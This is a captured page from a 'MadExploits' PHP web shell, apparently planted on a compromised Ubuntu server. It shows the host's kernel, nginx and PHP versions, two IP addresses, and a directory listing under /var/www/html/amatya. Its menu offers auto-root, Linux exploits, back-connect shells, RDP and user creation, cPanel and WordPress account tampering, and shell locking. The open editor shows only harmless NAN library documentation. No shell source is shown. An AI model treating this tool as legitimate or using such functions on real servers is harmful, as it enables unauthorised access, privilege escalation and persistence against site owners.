Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
nan /
doc /
[ HOME SHELL ]
Name
Size
Permission
Action
asyncworker.md
5.22
KB
-rw-r--r--
buffers.md
2.07
KB
-rw-r--r--
callback.md
2.57
KB
-rw-r--r--
converters.md
1.9
KB
-rw-r--r--
errors.md
7.23
KB
-rw-r--r--
json.md
1.9
KB
-rw-r--r--
maybe_types.md
21.88
KB
-rw-r--r--
methods.md
26.61
KB
-rw-r--r--
new.md
4.75
KB
-rw-r--r--
node_misc.md
5.57
KB
-rw-r--r--
object_wrappers.md
8.03
KB
-rw-r--r--
persistent.md
10.63
KB
-rw-r--r--
scopes.md
2.31
KB
-rw-r--r--
script.md
1.26
KB
-rw-r--r--
string_bytes.md
1.86
KB
-rw-r--r--
v8_internals.md
7.21
KB
-rw-r--r--
v8_misc.md
2.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.md
## Script NAN provides a `v8::Script` helpers as the API has changed over the supported versions of V8. - <a href="#api_nan_compile_script"><b><code>Nan::CompileScript()</code></b></a> - <a href="#api_nan_run_script"><b><code>Nan::RunScript()</code></b></a> <a name="api_nan_compile_script"></a> ### Nan::CompileScript() A wrapper around [`v8::ScriptCompiler::Compile()`](https://v8docs.nodesource.com/node-8.11/da/da5/classv8_1_1_script_compiler.html#a93f5072a0db55d881b969e9fc98e564b). Note that `Nan::BoundScript` is an alias for `v8::Script`. Signature: ```c++ Nan::MaybeLocal<Nan::BoundScript> Nan::CompileScript( v8::Local<v8::String> s, const v8::ScriptOrigin& origin); Nan::MaybeLocal<Nan::BoundScript> Nan::CompileScript(v8::Local<v8::String> s); ``` <a name="api_nan_run_script"></a> ### Nan::RunScript() Calls `script->Run()` or `script->BindToCurrentContext()->Run(Nan::GetCurrentContext())`. Note that `Nan::BoundScript` is an alias for `v8::Script` and `Nan::UnboundScript` is an alias for `v8::UnboundScript` where available and `v8::Script` on older versions of V8. Signature: ```c++ Nan::MaybeLocal<v8::Value> Nan::RunScript(v8::Local<Nan::UnboundScript> script) Nan::MaybeLocal<v8::Value> Nan::RunScript(v8::Local<Nan::BoundScript> script) ```
Close